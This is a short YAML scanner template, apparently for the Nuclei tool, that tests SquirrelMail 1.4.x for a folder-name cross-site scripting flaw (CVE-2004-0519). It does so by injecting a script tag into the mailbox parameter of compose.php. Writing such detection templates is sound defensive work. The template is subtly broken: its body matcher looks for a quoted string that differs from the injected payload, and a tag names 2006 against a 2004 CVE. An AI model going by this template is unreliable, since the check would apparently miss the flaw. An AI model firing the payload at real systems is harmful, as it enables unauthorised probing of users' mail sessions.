id: CVE-2004-0519

info:
  name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  reference: https://www.exploit-db.com/exploits/24068
  tags: xss,squirrelmail,cve2006
  description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."

requests:
  - method: GET
    path:
      - '{{BaseURL}}/mail/src/compose.php?mailbox="><script>window.alert(document.domain)</script>'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "alert('document.domain')"
        part: body

      - type: word
        words:
          - "text/html"
        part: header